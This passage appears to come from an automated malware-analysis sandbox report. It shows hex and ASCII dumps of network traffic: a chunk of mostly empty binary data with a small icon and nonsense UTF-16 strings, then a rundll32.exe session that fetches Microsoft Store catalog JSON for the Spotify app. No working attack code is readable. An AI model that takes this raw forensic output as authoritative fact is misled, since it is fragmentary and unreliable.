                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16057INData Raw: 31 66 66 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 59 7f 80 7b 6e 7b 7c 81 72 81 80 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 86 7c 7c 60 7f 82 84 69 86 7b 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: 1ff8Y{n{|rqe||`i{~
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16065INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16065INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16073INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16073INData Raw: 32 30 30 30 0d 0a 00 00 00 00 10 10 10 00 00 05 10 34 c0 10 09 00 f1 b4 09 92 ff 92 20 c4 03 c8 49 68 7c 0f 04 e7 83 cc 02 9b fc 00 02 2d ff ff e9 7b ff ff fe c4 00 00 01 00 01 00 20 20 02 00 01 00 01 00 30 01 00 00 0d 00 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 c0 00 00 01 80 00 00 01 80 00 00 03 00 00 00 23 00 00 00 36 00 00 00 3e 00 00 00 3f c0 00 00 3f 80 00 00 3f 00 00 00 3e 08 00 00 3c 14 00 00 38 36 00 00 30 41 00 00 20 36 00 00 00 14 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff
                                                                                                                                                                                    Data Ascii: 20004 Ih|-{ 0( @#6>???><860A 6
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16081INData Raw: 75 00 73 00 75 00
                                                                                                                                                                                    Data Ascii: usu
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16081INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:59:18 UTC16081INData Raw: 63 34 30 0d 0a 6d 00 20 00 62 00 69 00 64 00 75 00 6e 00 75 00 6c 00 6f 00 6d 00 6f 00 62 00 75 00 6d 00 65 00 74 00 20 00 7a 00 6f 00 6e 00 75 00 73 00 20 00 6d 00 75 00 6b 00 69 00 73 00 61 00 6e 00 65 00 66 00 61 00 6e 00 69 00 20 00 6a 00 69 00 6d 00 61 00 37 00 48 00 69 00 66 00 69 00 70 00 75 00 6d 00 6f 00 79 00 75 00 64 00 69 00 63 00 20 00 66 00 69 00 68 00 69 00 67 00 65 00 74 00 69 00 72 00 20 00 73 00 61 00 6d 00 69 00 78 00 61 00 76 00 69 00 62 00 61 00 20 00 62 00 6f 00 67 00 65 00 68 00 75 00 20 00 7a 00 75 00 78 00 65 00 6b 00 69 00 67 00 61 00 68 00 69 00 79 00 6f 00 6d 00 24 00 4a 00 69 00 78 00 61 00 74 00 65 00 6c 00 20 00 72 00 69 00 73 00 61 00 76 00 69 00 73 00 61 00 20 00 6c 00 6f 00 77 00 65 00 6c 00 61 00 78 00 6f 00 20 00 77 00
                                                                                                                                                                                    Data Ascii: c40m bidunulomobumet zonus mukisanefani jima7Hifipumoyudic fihigetir samixaviba bogehu zuxekigahiyom$Jixatel risavisa lowelaxo w


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    62192.168.2.44995420.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16084OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=SpotifyAB.SpotifyMusic_zpdnekdrzrea0&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: EeCPIhUbXk2NhS0S.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16084INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 27710
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:23 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: f28460e3-f152-4928-aa27-681a1e408270
                                                                                                                                                                                    MS-RequestId: 175fd003-075c-4897-9c4d-326948452712
                                                                                                                                                                                    MS-CV: EeCPIhUbXk2NhS0S.0.2.4.4008886896.2995654942.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: 6
                                                                                                                                                                                    MS-DocumentVersions: 9NCBCSZSJRSB|4616
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16085INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 43 42 43 53 5a 53 4a 52 53 42 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 31 32 2d 31 33 54 31 35 3a 31 31 3a 35 37 2e 32 31 35 36 35 37 37 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 36 30 37 31 38 38 35 30 36 30 37 35 33 30 33 30 32 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c
                                                                                                                                                                                    Data Ascii: {"BigIds":["9NCBCSZSJRSB"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-12-13T15:11:57.2156577Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3060718850607530302","EISListingIdentifier":null,"BackgroundColor":"","Caption":"",
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16086INData Raw: 64 74 68 22 3a 31 39 32 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 32 35 32 34 30 37 33 30 30 31 35 37 30 38 37 36 35 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 36 34 33 38 30 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 32 31 36 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 42 6f 78 41 72 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 4e 6d 44 30 47 74 75 33 62 38 65 78 4d 68 7a 66 2b
                                                                                                                                                                                    Data Ascii: dth":1920},{"FileId":"3025240730015708765","EISListingIdentifier":null,"BackgroundColor":"","Caption":"","FileSizeInBytes":64380,"ForegroundColor":"","Height":2160,"ImagePositionInfo":"","ImagePurpose":"BoxArt","UnscaledImageSHA256Hash":"NmD0Gtu3b8exMhzf+
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16087INData Raw: 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 32 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61 73 68 22 3a 22 49 52 56 6c 75 52 6f 38 4c 4e 69 37 32 5a 45 32 45 36 55 6a 57 6d 76 77 2b 33 5a 62 34 71 38 45 47 66 70 59 4f 56 64 53 4b 73 63 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 35 34 30 39 2e 31 33 35 37 31 34 39 38 38 32 36 38 35 37 32 30 31 2e 39 65 35 32 37 39 66 64 2d 65 30 34 31 2d 34 30 31 32 2d 39 39 62 39 2d
                                                                                                                                                                                    Data Ascii: ndColor":"","Height":1080,"ImagePositionInfo":"Desktop/2","ImagePurpose":"Screenshot","UnscaledImageSHA256Hash":"IRVluRo8LNi72ZE2E6UjWmvw+3Zb4q8EGfpYOVdSKsc=","Uri":"//store-images.s-microsoft.com/image/apps.5409.13571498826857201.9e5279fd-e041-4012-99b9-
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16088INData Raw: 43 54 33 4e 32 76 6f 42 69 64 6e 55 53 6e 49 64 47 73 2f 76 2f 73 4c 46 4f 75 75 6f 6b 3d 22 2c 22 55 72 69 22 3a 22 2f 2f 73 74 6f 72 65 2d 69 6d 61 67 65 73 2e 73 2d 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 69 6d 61 67 65 2f 61 70 70 73 2e 32 38 34 34 31 2e 31 33 35 37 31 34 39 38 38 32 36 38 35 37 32 30 31 2e 39 65 35 32 37 39 66 64 2d 65 30 34 31 2d 34 30 31 32 2d 39 39 62 39 2d 39 65 65 61 39 65 35 38 31 30 35 34 2e 34 30 37 30 61 34 35 36 2d 35 37 38 63 2d 34 64 33 62 2d 38 38 33 33 2d 63 63 63 30 61 62 66 65 37 38 61 30 22 2c 22 57 69 64 74 68 22 3a 31 39 32 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 37 33 34 38 32 34 32 35 37 37 32 37 33 32 38 35 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22
                                                                                                                                                                                    Data Ascii: CT3N2voBidnUSnIdGs/v/sLFOuuok=","Uri":"//store-images.s-microsoft.com/image/apps.28441.13571498826857201.9e5279fd-e041-4012-99b9-9eea9e581054.4070a456-578c-4d3b-8833-ccc0abfe78a0","Width":1920},{"FileId":"3007348242577273285","EISListingIdentifier":null,"
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16089INData Raw: 62 39 2d 39 65 65 61 39 65 35 38 31 30 35 34 2e 38 63 32 66 66 39 34 62 2d 38 33 39 39 2d 34 33 36 65 2d 62 32 63 33 2d 35 33 30 66 37 39 33 33 34 33 63 61 22 2c 22 57 69 64 74 68 22 3a 31 39 32 30 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 34 39 36 34 32 30 34 38 39 39 34 37 35 39 35 38 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 33 37 36 37 33 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 30 38 30 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 36 22 2c 22
                                                                                                                                                                                    Data Ascii: b9-9eea9e581054.8c2ff94b-8399-436e-b2c3-530f793343ca","Width":1920},{"FileId":"3004964204899475958","EISListingIdentifier":null,"BackgroundColor":"","Caption":"","FileSizeInBytes":737673,"ForegroundColor":"","Height":1080,"ImagePositionInfo":"Desktop/6","
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16090INData Raw: 6c 73 65 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 53 74 72 65 61 6d 20 53 70 6f 74 69 66 79 20 66 72 65 65 2c 20 77 69 74 68 20 6f 63 63 61 73 69 6f 6e 61 6c 20 61 64 73 2c 20 6f 72 20 67 6f 20 50 72 65 6d 69 75 6d 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 46 72 65 65 3a 5c 72 5c 6e e2 80 a2 20 44 69 73 63 6f 76 65 72 2c 20 6c 69 73 74 65 6e 20 61 6e 64 20 64 6f 77 6e 6c 6f 61 64 20 70 6f 64 63 61 73 74 73 20 66 6f 72 20 66 72 65 65 20 5c 72 5c 6e e2 80 a2 20 50 6c 61 79 20 61 6e 79 20 73 6f 6e 67 2c 20 61 72 74 69 73 74 2c 20 61 6c 62 75 6d 2c 20 70 6c 61 79 6c 69 73 74 2c 20 6f 72 20 70 6f 64 63 61 73 74 20 69 6e 73 74 61 6e 74 6c 79 5c 72 5c 6e e2 80 a2 20 42 72 6f 77 73 65 20 68 75 6e 64 72 65 64 73 20 6f 66 20 72 65 61 64 79 20 6d 61 64 65 20 70 6c 61 79 6c 69 73 74
                                                                                                                                                                                    Data Ascii: lse.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n Discover, listen and download podcasts for free \r\n Play any song, artist, album, playlist, or podcast instantly\r\n Browse hundreds of ready made playlist
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16091INData Raw: 68 54 69 74 6c 65 53 74 72 69 6e 67 22 3a 22 6d 75 73 69 63 20 61 70 70 73 22 2c 22 53 65 61 72 63 68 54 69 74 6c 65 54 79 70 65 22 3a 22 53 65 61 72 63 68 48 69 6e 74 22 7d 2c 7b 22 53 65 61 72 63 68 54 69 74 6c 65 53 74 72 69 6e 67 22 3a 22 66 72 65 65 20 6d 75 73 69 63 22 2c 22 53 65 61 72 63 68 54 69 74 6c 65 54 79 70 65 22 3a 22 53 65 61 72 63 68 48 69 6e 74 22 7d 2c 7b 22 53 65 61 72 63 68 54 69 74 6c 65 53 74 72 69 6e 67 22 3a 22 70 6f 64 63 61 73 74 73 22 2c 22 53 65 61 72 63 68 54 69 74 6c 65 54 79 70 65 22 3a 22 53 65 61 72 63 68 48 69 6e 74 22 7d 2c 7b 22 53 65 61 72 63 68 54 69 74 6c 65 53 74 72 69 6e 67 22 3a 22 73 74 72 65 61 6d 69 6e 67 22 2c 22 53 65 61 72 63 68 54 69 74 6c 65 54 79 70 65 22 3a 22 53 65 61 72 63 68 48 69 6e 74 22 7d 2c 7b
                                                                                                                                                                                    Data Ascii: hTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16092INData Raw: 22 2c 22 47 55 22 2c 22 47 47 22 2c 22 47 4e 22 2c 22 47 57 22 2c 22 47 59 22 2c 22 48 54 22 2c 22 48 4d 22 2c 22 48 4e 22 2c 22 41 5a 22 2c 22 42 53 22 2c 22 42 42 22 2c 22 42 59 22 2c 22 42 5a 22 2c 22 42 4a 22 2c 22 42 4d 22 2c 22 42 54 22 2c 22 4b 4d 22 2c 22 43 47 22 2c 22 43 44 22 2c 22 43 4b 22 2c 22 43 58 22 2c 22 43 43 22 2c 22 43 49 22 2c 22 43 57 22 2c 22 4a 4d 22 2c 22 53 4a 22 2c 22 4a 45 22 2c 22 4b 49 22 2c 22 4b 47 22 2c 22 4c 41 22 2c 22 4c 53 22 2c 22 4c 52 22 2c 22 4d 4f 22 2c 22 4d 4b 22 2c 22 4d 47 22 2c 22 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c 22 4d 56
                                                                                                                                                                                    Data Ascii: ","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16093INData Raw: 53 74 6f 72 65 50 72 6f 64 75 63 74 49 64 22 2c 22 56 61 6c 75 65 22 3a 22 63 65 61 63 35 64 33 66 2d 38 61 34 66 2d 34 30 65 31 2d 39 61 36 37 2d 37 36 64 39 31 30 38 63 37 63 62 35 22 7d 2c 7b 22 49 64 54 79 70 65 22 3a 22 4c 65 67 61 63 79 57 69 6e 64 6f 77 73 50 68 6f 6e 65 50 72 6f 64 75 63 74 49 64 22 2c 22 56 61 6c 75 65 22 3a 22 63 61 61 63 31 62 39 64 2d 36 32 31 62 2d 34 66 39 36 2d 62 31 34 33 2d 65 31 30 65 31 33 39 37 37 34 30 61 22 7d 2c 7b 22 49 64 54 79 70 65 22 3a 22 58 62 6f 78 54 69 74 6c 65 49 64 22 2c 22 56 61 6c 75 65 22 3a 22 31 36 38 31 32 37 39 32 39 33 22 7d 5d 2c 22 49 6e 67 65 73 74 69 6f 6e 53 6f 75 72 63 65 22 3a 22 44 43 45 22 2c 22 49 73 4d 69 63 72 6f 73 6f 66 74 50 72 6f 64 75 63 74 22 3a 66 61 6c 73 65 2c 22 50 72 65 66
                                                                                                                                                                                    Data Ascii: StoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"Pref
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16094INData Raw: 65 77 20 6d 75 73 69 63 20 74 6f 6f 2c 20 77 69 74 68 20 61 77 65 73 6f 6d 65 20 70 6c 61 79 6c 69 73 74 73 20 62 75 69 6c 74 20 6a 75 73 74 20 66 6f 72 20 79 6f 75 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 53 70 6f 74 69 66 79 20 61 6c 73 6f 20 6f 66 66 65 72 73 20 34 20 6d 69 6c 6c 69 6f 6e 20 50 6f 64 63 61 73 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 6f 72 69 67 69 6e 61 6c 73 20 61 6e 64 20 65 78 63 6c 75 73 69 76 65 73 20 74 68 61 74 20 79 6f 75 20 63 61 6e 27 74 20 66 69 6e 64 20 61 6e 79 77 68 65 72 65 20 65 6c 73 65 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 53 74 72 65 61 6d 20 53 70 6f 74 69 66 79 20 66 72 65 65 2c 20 77 69 74 68 20 6f 63 63 61 73 69 6f 6e 61 6c 20 61 64 73 2c 20 6f 72 20 67 6f 20 50 72 65 6d 69 75 6d 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 46 72 65 65
                                                                                                                                                                                    Data Ascii: ew music too, with awesome playlists built just for you.\r\n\r\nSpotify also offers 4 million Podcasts, including originals and exclusives that you can't find anywhere else.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16095INData Raw: 4d 75 73 69 63 20 61 6e 64 20 50 6f 64 63 61 73 74 73 22 2c 22 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 75 73 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 2c 22 44 5a 22 2c 22 41 52 22 2c 22 41 55 22 2c 22 41 54 22 2c 22 42 48 22 2c 22 42 44 22 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22 49 54 22 2c 22 4a 50 22 2c 22 4a 4f 22 2c 22 4b 5a 22 2c 22 4b 45 22 2c 22 4b 57 22 2c 22 4c 56 22 2c
                                                                                                                                                                                    Data Ascii: Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV",
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16096INData Raw: 2c 22 50 47 22 2c 22 50 59 22 2c 22 52 45 22 2c 22 52 57 22 2c 22 42 4c 22 2c 22 4d 46 22 2c 22 57 53 22 2c 22 53 54 22 2c 22 53 4e 22 2c 22 4d 50 22 2c 22 50 4e 22 2c 22 53 58 22 2c 22 53 42 22 2c 22 53 4f 22 2c 22 53 43 22 2c 22 53 4c 22 2c 22 47 53 22 2c 22 53 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75
                                                                                                                                                                                    Data Ascii: ,"PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"Produ
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16097INData Raw: 35 33 34 61 2d 37 30 30 33 62 33 35 63 30 37 35 39 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 30 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 30 37 35 34 32 37 35 33 32 38 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 30 37 31 30 33 36 36 35 35 39 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f
                                                                                                                                                                                    Data Ascii: 534a-7003b35c0759-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"co
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16098INData Raw: 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 43 42 43 53 5a 53 4a 52 53 42 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 30 65 39 30 37 66 31 64 2d 37 63 30 62 2d 34 62 63 33 2d 39 63 38 37 2d 35 62 61 31 32 35 32 66 64 31 62 38 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 35 63 33 35 33 62 39 63 2d 37 61 63 37 2d 34 64 32 37 2d 61 66 30 37 2d 39 32 33 65 37 64 39 61 61 32 65 32 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 53 70 6f 74 69 66 79 41 42 2e 53 70 6f 74 69 66 79 4d 75 73 69 63 5f 7a 70 64 6e 65 6b 64 72 7a 72 65 61 30 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22 41 70 70
                                                                                                                                                                                    Data Ascii: ":{"ProductId":"9NCBCSZSJRSB","WuBundleId":"0e907f1d-7c0b-4bc3-9c87-5ba1252fd1b8","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010","Content":null,"PackageFeatures":null}},{"App
